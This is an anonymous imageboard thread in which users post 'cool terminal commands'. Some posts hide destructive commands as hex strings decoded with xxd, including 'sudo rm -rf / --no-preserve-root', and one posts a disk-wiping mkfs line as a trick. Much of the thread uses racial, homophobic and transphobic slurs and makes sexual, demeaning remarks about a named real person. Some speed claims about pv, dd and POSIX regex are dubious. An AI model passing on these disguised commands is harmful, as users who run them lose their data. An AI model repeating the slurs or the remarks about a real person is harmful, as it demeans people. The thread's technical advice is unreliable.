What are some cool terminal commands?

What are some cool terminal commands?

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cowsay nigger

cowsay nigger


ok it's a program not a command but it's still rad as hell

Use Windows new terminal or conemu

$(echo 726d202d7266292a | xxd -r -p

>tfw forgot the closing parenthesis


(echo 7375646f20726d202d7266202f202d2d6e6f2d70726573657276652d726f6f74 | xxd -r -p)

Linux is a kernel, brainlet.

pv, the pipe viewer, is like cat without switches and with a progress bar.
Use it in place of dd to copy disks multiple magnitudes faster than dd with nice progress reporting as a bonus.
pv < input.iso > /dev/usbstick

Everyone point and laugh


curl -s artscene.textfiles.com/vt100/dirty.vt | pv -qL500

Why not dd status=progress?

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>falling for Jow Forums shitposting
>thinking rnms would ever use google+

history -c

i like this one
i look like a hacker now

im genuinely in love with natalie mars

$ toilet nigger

man fsck

what's her name?

what's better? this or unimatrix or Tmatrix?

i wanna suck her cock so bad

no homo

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Because dd, as by the spec, autistically loads and writes just as much data as you specify in it's block size arguments (or how much it detects the slower device can handle) which means that simply waiting to open and close files in a loop will make a file copy that would finish in ten minutes take six hours.
It's like how there isn't a way to implement POSIX-compliant regex in a performant way because it mandates strings be null-terminated meaning that you'll need to walk through every string to find its length so sed, awk, grep and the gang will forever be slow shit.

he's gross af

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man get

mkfs.ext4 /dev/sda[*]


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>only two useful cmds that aren't 9gag tier ITT
Jow Forums is ded

his name is natalie mars
gross tranny


>gross tranny

man man

you're jerking off to a mid-30s man that uses makeup to obscure the manliness and ridiculous bangs to obscure the hairline

no fucking way that's a man.

all trannies are gross

that asks for confirmation if a fs exists, faggot.

You are gay.

Attached: nat1.jpg (621x800, 36K)

_() { for ((i=1;i

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no, fuck off.
that's not her, shitter. they look nothing alike.

It's not, she transitioned.

Come out of the closet, dude.

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yea, nice memes.
fuck off already, nobody's buying your shit.

python3 -m http.server 8080

Serves the current directory over port 8080 in the local network. Cool for quick file sharing.

lookup the name given in this thread twice already ffs twitter.com/thenataliemars it's a dude.

>same general nose shape
>same eye color
>same freckling under the eyes
>same cheekbone shape, one just has more fat
I don't know dude

Well I was just standing here, and user locked himself in the closet. I asked myself "Why won't user just come out the closet?" Nobody has no answers, and so I pull out my gun! Tell me why user in the closet or else I'm gonna shoot someone!

Attached: man oh man.png (610x917, 430K)

Go check your eyes, faggot. Dudes are masculine.

Would still bang. I'm not insecure bout my sexuality.

fuck, it appears i was wrong and have a lot of reflecting to do.

are you stupid or just retarded

If it's feminine and it turns you off, I've bad news for you: you're a faggot. Only gays are attracted to masculinity.

>>faster than dd
Is just a matter of specifying the correct buffer size instead of using the default.

cat is faster
also too large buffer is bad for you

it's not feminine, it's a parody of femininity that only holds up with the right lighting, camera angles, and makeup. i've seen plenty of average women that i'd fuck but never any trannies that haven't spent 4 hours dressing up and selecting the right picture from 1,000

that's the thing, i'm still hard looking at her twitter, but the fact it's a man is slightly disquieting.

Is this white knighting a meme


What are some cool hereditarily finite sets?
[spoiler]genuine question[/spoiler]

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That's how it works.

>It's like how there isn't a way to implement POSIX-compliant regex in a performant way because it mandates strings be null-terminated meaning that you'll need to walk through every string to find its length so sed, awk, grep and the gang will forever be slow shit.
I don't understand. Wouldn't caching a hashtable of lengths be identical to length prefixed strings? You get your O(1) length lookup back, and it's more modular. You get the simplicity of POSIX with the benefit of constant time length lookups.

Also, harder question, what are some cool hereditarily countable sets?

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